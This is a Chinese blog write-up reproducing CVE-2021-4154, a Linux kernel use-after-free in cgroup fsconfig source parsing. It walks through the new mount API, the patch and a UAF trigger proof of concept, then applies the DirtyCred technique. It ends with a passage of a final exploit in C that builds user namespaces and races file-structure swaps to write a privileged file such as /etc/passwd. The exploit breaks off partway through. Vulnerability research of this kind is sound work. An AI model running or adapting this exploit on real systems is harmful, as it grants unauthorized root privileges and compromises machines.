CVE-2021-4154 Remake

本文最后更新于:2024年4月8日 下午

0x00:写在所有之前

又是一个无地址泄露CVE的复现!

本文所用的源码均为linux 5.8.0

0x01:信息搜集

NVD - CVE-2021-4154 (nist.gov)

影响版本非常广

康一眼commit

下面这个poc可以造成UAF

1
2
3
4
5
//The following sequence can be used to trigger a UAF:
int fscontext_fd = fsopen("cgroup");
int fd_null = open("/dev/null", O_RDONLY);
int fsconfig(fscontext_fd, FSCONFIG_SET_FD, "source", fd_null);
close_range(3, ~0U, 0);

这个是patch

1
2
3
4
5
6
7
8
9
10
11
12
13
diff --git a/kernel/cgroup/cgroup-v1.c b/kernel/cgroup/cgroup-v1.c
index ee93b6e8958746..527917c0b30be4 100644
--- a/kernel/cgroup/cgroup-v1.c
+++ b/kernel/cgroup/cgroup-v1.c
@@ -912,6 +912,8 @@ int cgroup1_parse_param(struct fs_context *fc, struct fs_parameter *param)
opt = fs_parse(fc, cgroup1_fs_parameters, param, &result);
if (opt == -ENOPARAM) {
if (strcmp(param->key, "source") == 0) {
+ if (param->type != fs_value_is_string)
+ return invalf(fc, "Non-string source");
if (fc->source)
return invalf(fc, "Multiple sources not supported");
fc->source = param->string;

以上便是收集到的资料

0x02:前置知识

新一代mount系统调用

这大概是VFS的胜利🤔

先来康一下老版本的mount是怎么用的

1
2
3
4
5
6
7
8
9
#include <sys/mount.h>  
#include <stdio.h>

int main(int argc, char *argv[]) {
if (mount("/dev/sdb1", "/mnt/tmp", "xfs", 0, NULL)) {
perror("mount failed");
}
return 0;
}

简单粗暴,一个函数直接完事

but新的mount API将过去封装的一个“臃肿”的mount拆分成了若干个系统调用(或者说若干个独立的阶段)

首先是fsopen

fsopen

很粗暴的系统调用的封装

1
2
3
4
static inline int fsopen(const char *fs_name, unsigned int flags)
{
return syscall(__NR_fsopen, fs_name, flags);
}

**fsopen(),功能与open()系统调用非常相似。当open()用于打开一个文件并获取与之相关的文件描述符fd时,fsopen()**则旨在打开一个文件系统,并获取该文件系统的上下文。随后,它会将这个文件系统上下文与一个文件描述符绑定,并返回该文件描述符。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
/*
* Open a filesystem by name so that it can be configured for mounting.
*
* We are allowed to specify a container in which the filesystem will be
* opened, thereby indicating which namespaces will be used (notably, which
* network namespace will be used for network filesystems).
*/
SYSCALL_DEFINE2(fsopen, const char __user *, _fs_name, unsigned int, flags)
{
struct file_system_type *fs_type;
struct fs_context *fc;
const char *fs_name;
int ret;
//使用ns_capable函数检查当前进程的命名空间是否具有CAP_SYS_ADMIN权限
if (!ns_capable(current->nsproxy->mnt_ns->user_ns, CAP_SYS_ADMIN))
return -EPERM;
//检查传入的flags参数是否包含除了FSOPEN_CLOEXEC之外的其他位
if (flags & ~FSOPEN_CLOEXEC)
return -EINVAL;
//使用strndup_user函数从用户空间复制文件系统的名称,这个名称的长度限制为PAGE_SIZE
fs_name = strndup_user(_fs_name, PAGE_SIZE);
if (IS_ERR(fs_name))
return PTR_ERR(fs_name);
//根据文件系统名称获取file_system_type结构
fs_type = get_fs_type(fs_name);
kfree(fs_name);
if (!fs_type)
return -ENODEV;
//创建一个上下文fc
fc = fs_context_for_mount(fs_type, 0);
put_filesystem(fs_type);//减少文件系统类型的引用计数。
if (IS_ERR(fc))
return PTR_ERR(fc);
//表示正在创建挂载参数
fc->phase = FS_CONTEXT_CREATE_PARAMS;
//分配一个日志上下文
ret = fscontext_alloc_log(fc);
if (ret < 0)
goto err_fc;
//创建一个文件描述符,如果flags包含FSOPEN_CLOEXEC,则使用O_CLOEXEC标志
return fscontext_create_fd(fc, flags & FSOPEN_CLOEXEC ? O_CLOEXEC : 0);

err_fc:
put_fs_context(fc);
return ret;
}

其中fs_context是随着这一批新的系统调用一起引入的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
struct fs_context {
//文件系统上下文实例持续期间,提供给文件系统上下文使用的众多方法。一般由特定文件系统类型的init_fs_context方法来对其进行设置。
const struct fs_context_operations *ops;
struct mutex uapi_mutex; /* Userspace access mutex */
//用来指向即将被挂载(或重新配置)的文件系统所属文件系统类型实例的指针
struct file_system_type *fs_type;
//指向文件系统私有数据的指针,常用于存储需要特定文件系统来解析的选项
void *fs_private; /* The filesystem's context */
void *sget_key;
struct dentry *root; /* The root and superblock */
struct user_namespace *user_ns; /* The user namespace for this mount */
struct net *net_ns; /* The network namespace for this mount */
const struct cred *cred; /* The mounter's credentials */
struct fc_log *log; /* Logging buffer */
const char *source; /* The source name (eg. dev path) */
void *security; /* Linux S&M options */
void *s_fs_info; /* Proposed s_fs_info */
unsigned int sb_flags; /* Proposed superblock flags (SB_*) */
unsigned int sb_flags_mask; /* Superblock flags that were changed */
unsigned int s_iflags; /* OR'd with sb->s_iflags */
unsigned int lsm_flags; /* Information flags from the fs to the LSM */
enum fs_context_purpose purpose:8;
enum fs_context_phase phase:8; /* The phase the context is in */
bool need_free:1; /* Need to call ops->free() */
bool global:1; /* Goes into &init_user_ns */
};

PS:注意这里打开的不是一个具体的on-disk文件系统(如/dev/sdb1上的文件系统),而是一个文件系统“类型”

获取了针对文件系统的文件描述符后,接下来步骤是使用**fsconfig()**来对这个文件系统上下文进行配置

fsconfig

1
2
3
4
5
static inline int fsconfig(int fsfd, unsigned int cmd,
const char *key, const void *val, int aux)
{
return syscall(__NR_fsconfig, fsfd, cmd, key, val, aux);
}

详细一点的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
/**
* sys_fsconfig - Set parameters and trigger actions on a context
* @fd: The filesystem context to act upon
* @cmd: The action to take
* @_key: Where appropriate, the parameter key to set
* @_value: Where appropriate, the parameter value to set
* @aux: Additional information for the value
*
* This system call is used to set parameters on a context, including
* superblock settings, data source and security labelling.
*
* Actions include triggering the creation of a superblock and the
* reconfiguration of the superblock attached to the specified context.
*
* When setting a parameter, @cmd indicates the type of value being proposed
* and @_key indicates the parameter to be altered.
*
* @_value and @aux are used to specify the value, should a value be required:
*
* (*) fsconfig_set_flag: No value is specified. The parameter must be boolean
* in nature. The key may be prefixed with "no" to invert the
* setting. @_value must be NULL and @aux must be 0.
*
* (*) fsconfig_set_string: A string value is specified. The parameter can be
* expecting boolean, integer, string or take a path. A conversion to an
* appropriate type will be attempted (which may include looking up as a
* path). @_value points to a NUL-terminated string and @aux must be 0.
*
* (*) fsconfig_set_binary: A binary blob is specified. @_value points to the
* blob and @aux indicates its size. The parameter must be expecting a
* blob.
*
* (*) fsconfig_set_path: A non-empty path is specified. The parameter must be
* expecting a path object. @_value points to a NUL-terminated string that
* is the path and @aux is a file descriptor at which to start a relative
* lookup or AT_FDCWD.
*
* (*) fsconfig_set_path_empty: As fsconfig_set_path, but with AT_EMPTY_PATH
* implied.
*
* (*) fsconfig_set_fd: An open file descriptor is specified. @_value must be
* NULL and @aux indicates the file descriptor.
*/
SYSCALL_DEFINE5(fsconfig,
int, fd,
unsigned int, cmd,
const char __user *, _key,
const void __user *, _value,
int, aux)
{
struct fs_context *fc;
struct fd f;
int ret;
int lookup_flags = 0;
//定义了一个struct fs_parameter param变量
struct fs_parameter param = {
.type = fs_value_is_undefined,
};

if (fd < 0)
return -EINVAL;
//一堆switch
switch (cmd) {
case FSCONFIG_SET_FLAG:
if (!_key || _value || aux)
return -EINVAL;
break;
case FSCONFIG_SET_STRING:
if (!_key || !_value || aux)
return -EINVAL;
break;
case FSCONFIG_SET_BINARY:
if (!_key || !_value || aux <= 0 || aux > 1024 * 1024)
return -EINVAL;
break;
case FSCONFIG_SET_PATH:
case FSCONFIG_SET_PATH_EMPTY:
if (!_key || !_value || (aux != AT_FDCWD && aux < 0))
return -EINVAL;
break;
case FSCONFIG_SET_FD:
if (!_key || _value || aux < 0)
return -EINVAL;
break;
case FSCONFIG_CMD_CREATE:
case FSCONFIG_CMD_RECONFIGURE:
if (_key || _value || aux)
return -EINVAL;
break;
default:
return -EOPNOTSUPP;
}

f = fdget(fd);
if (!f.file)
return -EBADF;
ret = -EINVAL;
//判断当前通过fd得到的文件实例的方法集是不是fscontext_fops
if (f.file->f_op != &fscontext_fops)
goto out_f;

fc = f.file->private_data;
if (fc->ops == &legacy_fs_context_ops) {
switch (cmd) {
case FSCONFIG_SET_BINARY:
case FSCONFIG_SET_PATH:
case FSCONFIG_SET_PATH_EMPTY:
case FSCONFIG_SET_FD:
ret = -EOPNOTSUPP;
goto out_f;
}
}
//把这个字符串赋值到param.key
if (_key) {
param.key = strndup_user(_key, 256);
if (IS_ERR(param.key)) {
ret = PTR_ERR(param.key);
goto out_f;
}
}
//根据不同的cmd,确定不同的操作
switch (cmd) {
case FSCONFIG_SET_FLAG:
param.type = fs_value_is_flag;
break;
case FSCONFIG_SET_STRING:
param.type = fs_value_is_string;
param.string = strndup_user(_value, 256);
if (IS_ERR(param.string)) {
ret = PTR_ERR(param.string);
goto out_key;
}
param.size = strlen(param.string);
break;
case FSCONFIG_SET_BINARY:
param.type = fs_value_is_blob;
param.size = aux;
param.blob = memdup_user_nul(_value, aux);
if (IS_ERR(param.blob)) {
ret = PTR_ERR(param.blob);
goto out_key;
}
break;
case FSCONFIG_SET_PATH_EMPTY:
lookup_flags = LOOKUP_EMPTY;
/* fallthru */
case FSCONFIG_SET_PATH:
param.type = fs_value_is_filename;
param.name = getname_flags(_value, lookup_flags, NULL);
if (IS_ERR(param.name)) {
ret = PTR_ERR(param.name);
goto out_key;
}
param.dirfd = aux;
param.size = strlen(param.name->name);
break;
case FSCONFIG_SET_FD:
param.type = fs_value_is_file;
ret = -EBADF;
param.file = fget(aux);
if (!param.file)
goto out_key;
break;
default:
break;
}
//加锁
ret = mutex_lock_interruptible(&fc->uapi_mutex);
if (ret == 0) {
ret = vfs_fsconfig_locked(fc, cmd, &param);//very important
mutex_unlock(&fc->uapi_mutex);
}

/* Clean up the our record of any value that we obtained from
* userspace. Note that the value may have been stolen by the LSM or
* filesystem, in which case the value pointer will have been cleared.
*/
switch (cmd) {
case FSCONFIG_SET_STRING:
case FSCONFIG_SET_BINARY:
kfree(param.string);
break;
case FSCONFIG_SET_PATH:
case FSCONFIG_SET_PATH_EMPTY:
if (param.name)
putname(param.name);
break;
case FSCONFIG_SET_FD:
if (param.file)
fput(param.file);
break;
default:
break;
}
out_key:
kfree(param.key);
out_f:
fdput(f);
return ret;
}

首先是一个结构体变量,这个变量将用于下面的一系列操作

1
2
3
struct fs_parameter param = {
.type = fs_value_is_undefined,
};

看一下define

1
2
3
4
5
6
7
8
9
10
11
12
struct fs_parameter {
const char *key; /* Parameter name */
enum fs_value_type type:8; /* The type of value here */
union {
char *string;
void *blob;
struct filename *name;
struct file *file;
};
size_t size;
int dirfd;
};

vfs_fsconfig_locked

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
/*
* Check the state and apply the configuration. Note that this function is
* allowed to 'steal' the value by setting param->xxx to NULL before returning.
*/
static int vfs_fsconfig_locked(struct fs_context *fc, int cmd,
struct fs_parameter *param)
{
struct super_block *sb;
int ret;

ret = finish_clean_context(fc);
if (ret)
return ret;
switch (cmd) {
case FSCONFIG_CMD_CREATE:
//检查fc的阶段是否为FS_CONTEXT_CREATE_PARAMS
if (fc->phase != FS_CONTEXT_CREATE_PARAMS)
return -EBUSY;
//检查是否有创建文件系统的权限
if (!mount_capable(fc))
return -EPERM;
//设置fc的阶段为FS_CONTEXT_CREATING
fc->phase = FS_CONTEXT_CREATING;
//获取文件树
ret = vfs_get_tree(fc);
if (ret)
break;
sb = fc->root->d_sb;
ret = security_sb_kern_mount(sb);
if (unlikely(ret)) {
fc_drop_locked(fc);
break;
}
up_write(&sb->s_umount);
//将fc的阶段设置为FS_CONTEXT_AWAITING_MOUNT并返回成功
fc->phase = FS_CONTEXT_AWAITING_MOUNT;
return 0;
case FSCONFIG_CMD_RECONFIGURE:
if (fc->phase != FS_CONTEXT_RECONF_PARAMS)
return -EBUSY;
fc->phase = FS_CONTEXT_RECONFIGURING;
sb = fc->root->d_sb;
if (!ns_capable(sb->s_user_ns, CAP_SYS_ADMIN)) {
ret = -EPERM;
break;
}
down_write(&sb->s_umount);
ret = reconfigure_super(fc);
up_write(&sb->s_umount);
if (ret)
break;
vfs_clean_context(fc);
return 0;
default:
if (fc->phase != FS_CONTEXT_CREATE_PARAMS &&
fc->phase != FS_CONTEXT_RECONF_PARAMS)
return -EBUSY;
//默认执行此处
return vfs_parse_fs_param(fc, param);
}
fc->phase = FS_CONTEXT_FAILED;
return ret;
}

vfs_parse_fs_param

在此之前,我们完成了对param的赋值。现在要做的就是把param里的参数转到文件系统上下文里

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
/**
* vfs_parse_fs_param - Add a single parameter to a superblock config
* @fc: The filesystem context to modify
* @param: The parameter
*
* A single mount option in string form is applied to the filesystem context
* being set up. Certain standard options (for example "ro") are translated
* into flag bits without going to the filesystem. The active security module
* is allowed to observe and poach options. Any other options are passed over
* to the filesystem to parse.
*
* This may be called multiple times for a context.
*
* Returns 0 on success and a negative error code on failure. In the event of
* failure, supplementary error information may have been set.
*/
int vfs_parse_fs_param(struct fs_context *fc, struct fs_parameter *param)
{
int ret;

if (!param->key)
return invalf(fc, "Unnamed parameter\n");

ret = vfs_parse_sb_flag(fc, param->key);
if (ret != -ENOPARAM)
return ret;

ret = security_fs_context_parse_param(fc, param);
if (ret != -ENOPARAM)
/* Param belongs to the LSM or is disallowed by the LSM; so
* don't pass to the FS.
*/
return ret;

if (fc->ops->parse_param) {
ret = fc->ops->parse_param(fc, param);
if (ret != -ENOPARAM)
return ret;
}

/* If the filesystem doesn't take any arguments, give it the
* default handling of source.
*/
if (strcmp(param->key, "source") == 0) {
if (param->type != fs_value_is_string)
return invalf(fc, "VFS: Non-string source");
if (fc->source)
return invalf(fc, "VFS: Multiple sources");
fc->source = param->string;
param->string = NULL;
return 0;
}

return invalf(fc, "%s: Unknown parameter '%s'",
fc->fs_type->name, param->key);
}

其中最重要的一句是

1
ret = fc->ops->parse_param(fc, param);

很显然,这里是需要使用文件系统上下文中的parse_param方法,如果我们设置文件系统为cgroup1

则会调用到cgroup1_parse_param

cgroup1_parse_param

于此,我们终于来到了patch中的目标函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
int cgroup1_parse_param(struct fs_context *fc, struct fs_parameter *param)
{
struct cgroup_fs_context *ctx = cgroup_fc2context(fc);
struct cgroup_subsys *ss;
struct fs_parse_result result;
int opt, i;
//主要的挂载参数的解析函数
opt = fs_parse(fc, cgroup1_fs_parameters, param, &result);
if (opt == -ENOPARAM) {
if (strcmp(param->key, "source") == 0) {
fc->source = param->string;
param->string = NULL;
return 0;
}
for_each_subsys(ss, i) {
if (strcmp(param->key, ss->legacy_name))
continue;
ctx->subsys_mask |= (1 << i);
return 0;
}
return invalfc(fc, "Unknown subsys name '%s'", param->key);
}
if (opt < 0)
return opt;

switch (opt) {
case Opt_none:
/* Explicitly have no subsystems */
ctx->none = true;
break;
case Opt_all:
ctx->all_ss = true;
break;
case Opt_noprefix:
ctx->flags |= CGRP_ROOT_NOPREFIX;
break;
case Opt_clone_children:
ctx->cpuset_clone_children = true;
break;
case Opt_cpuset_v2_mode:
ctx->flags |= CGRP_ROOT_CPUSET_V2_MODE;
break;
case Opt_xattr:
ctx->flags |= CGRP_ROOT_XATTR;
break;
case Opt_release_agent:
/* Specifying two release agents is forbidden */
if (ctx->release_agent)
return invalfc(fc, "release_agent respecified");
ctx->release_agent = param->string;
param->string = NULL;
break;
case Opt_name:
/* blocked by boot param? */
if (cgroup_no_v1_named)
return -ENOENT;
/* Can't specify an empty name */
if (!param->size)
return invalfc(fc, "Empty name");
if (param->size > MAX_CGROUP_ROOT_NAMELEN - 1)
return invalfc(fc, "Name too long");
/* Must match [\w.-]+ */
for (i = 0; i < param->size; i++) {
char c = param->string[i];
if (isalnum(c))
continue;
if ((c == '.') || (c == '-') || (c == '_'))
continue;
return invalfc(fc, "Invalid name");
}
/* Specifying two names is forbidden */
if (ctx->name)
return invalfc(fc, "name respecified");
ctx->name = param->string;
param->string = NULL;
break;
}
return 0;
}

调用链可以确定下来

1
2
3
4
sys_fsconfig()
vfs_fsconfig_locked()
vfs_parse_fs_param()
fc->ops->parse_param(cgroup1_parse_param)

到此我们具备了创建一个挂载实例的所有准备工作,下一步就是创建一个挂载实例

创建一个挂载实例需要使用fsmount()

fsmount

这个fsmount创建一个挂载实例后关联到一个新的文件描述符,这个新的文件描述符以O_PATH打开。

1
2
3
4
static inline int fsmount(int fsfd, unsigned int flags, unsigned int ms_flags)
{
return syscall(__NR_fsmount, fsfd, flags, ms_flags);
}

下面就是最后一步了,我们得到了一个挂载实例,下面就是将这个挂载实例attach到挂载点上。这一步使用move_mount()系统调用。

move_mount

1
2
3
4
5
6
7
8
static inline int move_mount(int from_dfd, const char *from_pathname,
int to_dfd, const char *to_pathname,
unsigned int flags)
{
return syscall(__NR_move_mount,
from_dfd, from_pathname,
to_dfd, to_pathname, flags);
}

0x03:漏洞分析

再来看一眼fs_parameter这个结构体,问题出在中间这个union

1
2
3
4
5
6
7
8
9
10
11
12
struct fs_parameter {
const char *key; /* Parameter name */
enum fs_value_type type:8; /* The type of value here */
union {
char *string;
void *blob;
struct filename *name;
struct file *file;
};
size_t size;
int dirfd;
};

sys_fsconfig中,当CMDFSCONFIG_SET_FD时,会有如下操作

1
2
3
4
5
6
7
case FSCONFIG_SET_FD:
param.type = fs_value_is_file;
ret = -EBADF;
param.file = fget(aux);
if (!param.file)
goto out_key;
break;

此时param.file通过文件描述符指向一个文件实例

但是在接下来的调用链,cgroup1_parse_param中,当keysource时,会把param->string赋值给fc->source

但是由于param结构体中,stringfile是个union,两者只能存在一个,所以此处存在把文件实例传递给fc->source的风险

1
2
3
4
5
6
7
opt = fs_parse(fc, cgroup1_fs_parameters, param, &result);
if (opt == -ENOPARAM) {
if (strcmp(param->key, "source") == 0) {
fc->source = param->string;
param->string = NULL;
return 0;
}

接下来,若我们关闭文件描述符fscontext_fd,则会调用到fscontext_fops中的fscontext_release

1
2
3
4
5
const struct file_operations fscontext_fops = {
.read = fscontext_read,
.release = fscontext_release,
.llseek = no_llseek,
};

fscontext_release中会调用put_fs_context

1
2
3
4
5
6
7
8
9
10
static int fscontext_release(struct inode *inode, struct file *file)
{
struct fs_context *fc = file->private_data;

if (fc) {
file->private_data = NULL;
put_fs_context(fc);
}
return 0;
}

put_fs_context会释放fc->source

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
/**
* put_fs_context - Dispose of a superblock configuration context.
* @fc: The context to dispose of.
*/
void put_fs_context(struct fs_context *fc)
{
struct super_block *sb;

if (fc->root) {
sb = fc->root->d_sb;
dput(fc->root);
fc->root = NULL;
deactivate_super(sb);
}

if (fc->need_free && fc->ops && fc->ops->free)
fc->ops->free(fc);

security_free_mnt_opts(&fc->security);
put_net(fc->net_ns);
put_user_ns(fc->user_ns);
put_cred(fc->cred);
put_fc_log(fc);
put_filesystem(fc->fs_type);
kfree(fc->source);
kfree(fc);
}

若之前将fc->source指向一个文件实例,那么在此处释放后,该实例事实上还在使用中

可以关闭与之关联的文件描述符造成double free

可以写个小demo测试一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <linux/mount.h>
#include <linux/unistd.h>

int tmp;

void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}


int main()
{
int fscontext_fd;
fscontext_fd = syscall(__NR_fsopen, "cgroup", FSOPEN_CLOEXEC);
if (fscontext_fd < 0)
err_exit("fsopen failed!");

int fd_null = open("/dev/null", O_RDONLY);
if (fd_null < 0)
err_exit("open /dev/null failed!");

syscall(__NR_fsconfig, fscontext_fd, FSCONFIG_SET_FD, "source", NULL, fd_null);
close(fscontext_fd);

tmp = open("/dev/ptmx", O_RDONLY);


}

可以看到在put_fs_context中是释放的是0xffff888005f59c00的堆块

在接下打开/dev/ptmx过程中,发现重新申请回来的file结构体和之前的释放的堆块相同

但是此时fd_null并未关闭,于是,此时是/dev/null和/dev/ptmx共用一个file

0x04:漏洞利用——dirtycred!!!

于此处实践一下dirtycred这一手法

根据漏洞,可以造成一个file凭证的UAF,步骤如下:

  1. 当在用户态打开一个文件时,内核会分配一个file结构体,用来保存文件的信息
  2. 利用fsopen打开一个文件系统,使用fsconfig可以指定已经打开的文件和文件系统
  3. fsconfig中存在参数解析漏洞,倒是关闭文件系统时,会造成file结构体的释放,形成UAF漏洞
  4. 接下来不断得打开文件,可以分配到被释放得file结构,此时,存在两个文件描述符指向同一个file结构体

下图来自blingbling师傅的blog呜呜

根据dirtycred的思路,在文件检查和实际写入间隙,将file结构体替换成无写入权限的特权文件

一般来说,write的函数调用链为

1
2
3
4
5
6
sys_write()
ksys_write()
vfs_write()
new_sync_write
call_write_iter
file->f_op->write_iter

vfs_write

vfs_write中,会check将要写入的文件是否具有可写入权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos)
{
ssize_t ret;

if (!(file->f_mode & FMODE_WRITE)) //check
return -EBADF;
if (!(file->f_mode & FMODE_CAN_WRITE)) //check
return -EINVAL;
if (unlikely(!access_ok(buf, count)))
return -EFAULT;

ret = rw_verify_area(WRITE, file, pos, count);
if (ret)
return ret;
if (count > MAX_RW_COUNT)
count = MAX_RW_COUNT;
file_start_write(file);
if (file->f_op->write)
ret = file->f_op->write(file, buf, count, pos);
else if (file->f_op->write_iter)
ret = new_sync_write(file, buf, count, pos);
else
ret = -EINVAL;
if (ret > 0) {
fsnotify_modify(file);
add_wchar(current, ret);
}
inc_syscw(current);
file_end_write(file);
return ret;
}

在不同的文件系统中,file->f_op->write_iter不同,常见中的ext4系统中对应的是ext4_buffered_write_iter

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
static ssize_t ext4_buffered_write_iter(struct kiocb *iocb,
struct iov_iter *from)
{
ssize_t ret;
struct inode *inode = file_inode(iocb->ki_filp);

if (iocb->ki_flags & IOCB_NOWAIT)
return -EOPNOTSUPP;

inode_lock(inode); //此处便会对写入的进程加锁,同一时间内只允许一个进程进行写入操作
ret = ext4_write_checks(iocb, from);
if (ret <= 0)
goto out;

ret = generic_perform_write(iocb, from);

out:
inode_unlock(inode);
if (unlikely(ret <= 0))
return ret;
return generic_write_sync(iocb, ret);
}

下图也是来自blingbling师傅的blog

但是,这个时间窗口非常小。且一般常用的userfaultfd5.11版本及以后,无法在非root权限下使用,而代替userfaultfd的FUSE笔者还8会。便采用了向文件写入大量data这一方法——因为文件系统不允许两个进程同时写同一个文件,假设进程A/B同时对同一文件写入,进程A先获取锁,写入大量数据(1G文件大概要写2-3秒,可以说是很长的时间窗口了),进程B在完成check后等待获取锁,那么这中间的时间就可以替换file结构体

下图还是来自blingbling师傅的blog

PS1:fsopen和fsconfig只用在root权限下才可使用,所以需要开辟新的命名空间来绕过该限制

PS2:对将要打开的普通权限文件创建一个链接

ksys_write中,会调用到fdget_pos

1
2
3
4
5
ssize_t ksys_write(unsigned int fd, const char __user *buf, size_t count)
{
struct fd f = fdget_pos(fd);
ssize_t ret = -EBADF;
.......

fdget_pos__fdget_pos的套娃

如果file_needs_f_pos_lock(file)返回值为true,那么这个线程就会被上锁,但是此时还没过file权限check呢,这显然是我们不想看到的,那该怎么办呢?

1
2
3
4
5
6
7
8
9
10
11
unsigned long __fdget_pos(unsigned int fd)
{
unsigned long v = __fdget(fd);
struct file *file = (struct file *)(v & ~3);

if (file && file_needs_f_pos_lock(file)) {
v |= FDPUT_POS_UNLOCK;
mutex_lock(&file->f_pos_lock);
}
return v;
}

可以看到如果file->f_mode带有 FMODE_ATOMIC_POS这个标志,那这个返回值为1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/*
* Try to avoid f_pos locking. We only need it if the
* file is marked for FMODE_ATOMIC_POS, and it can be
* accessed multiple ways.
*
* Always do it for directories, because pidfd_getfd()
* can make a file accessible even if it otherwise would
* not be, and for directories this is a correctness
* issue, not a "POSIX requirement".
*/
static inline bool file_needs_f_pos_lock(struct file *file)
{
return (file->f_mode & FMODE_ATOMIC_POS) &&
(file_count(file) > 1 || file->f_op->iterate_shared);
}

what is FMODE_ATOMIC_POS?

源码搜索发现open中也调用到了

1
2
3
4
5
......
/* POSIX.1-2008/SUSv4 Section XSI 2.9.7 */
if (S_ISREG(inode->i_mode) || S_ISDIR(inode->i_mode))
f->f_mode |= FMODE_ATOMIC_POS;
......

S_ISREGS_ISDIR又为何物?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#define S_ISLNK(m)	(((m) & S_IFMT) == S_IFLNK)
#define S_ISREG(m) (((m) & S_IFMT) == S_IFREG)
#define S_ISDIR(m) (((m) & S_IFMT) == S_IFDIR)
#define S_ISCHR(m) (((m) & S_IFMT) == S_IFCHR)
#define S_ISBLK(m) (((m) & S_IFMT) == S_IFBLK)
#define S_ISFIFO(m) (((m) & S_IFMT) == S_IFIFO)
#define S_ISSOCK(m) (((m) & S_IFMT) == S_IFSOCK)
//S_ISLNK(st_mode):是否是一个连接
//S_ISREG(st_mode):是否是一个常规文件
//S_ISDIR(st_mode):是否是一个目录
//S_ISCHR(st_mode):是否是一个字符设备
//S_ISBLK(st_mode):是否是一个块设备
//S_ISFIFO(st_mode):是否 是一个FIFO文件.
//S_ISSOCK(st_mode):是否是一个SOCKET文件

所以只要我们打开的文件不是目录或者常规文件就可以规避掉这个锁

FINAL EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <pthread.h>
#include <stddef.h>
#include <signal.h>
#include <stdint.h>
#include <sys/utsname.h>
#include <syscall.h>
#include <linux/mount.h>
#include <linux/unistd.h>
#include <linux/kcmp.h>
#include <sys/mman.h>
#include <crypt.h>

#define FILE_NUM 1000
#define PAGE_NUM 0x40000

int tmp_fd, uaf_fd, fscontext_fd, victim_fd;
int target_fd[FILE_NUM];
pid_t fork_fd;
pthread_t large_write_thread, passwd_write_thread;
int flag = 0, large_write_flag = 0, passwd_write_flag;
size_t start_addr = 0x114514000;
int ret = 0;

void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(1);
exit(EXIT_FAILURE);
}

void init_namespace(void) {
int fd;
char buff[0x100];

uid_t uid = getuid();
gid_t gid = getgid();

puts("[*] init namespace");
if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) {
err_exit("unshare(CLONE_NEWUSER | CLONE_NEWNS)");
}

if (unshare(CLONE_NEWNET)) {
err_exit("unshare(CLONE_NEWNET)");
}

fd = open("/proc/self/setgroups", O_WRONLY);
snprintf(buff, sizeof(buff), "deny");
write(fd, buff, strlen(buff));
close(fd);

fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(buff, sizeof(buff), "0 %d 1", uid);
write(fd, buff, strlen(buff));
close(fd);

fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(buff, sizeof(buff), "0 %d 1", gid);
write(fd, buff, strlen(buff));
close(fd);
}

void create_dir()
{
puts("[*] create exp_dir");
system("rm -rf exp_dir");
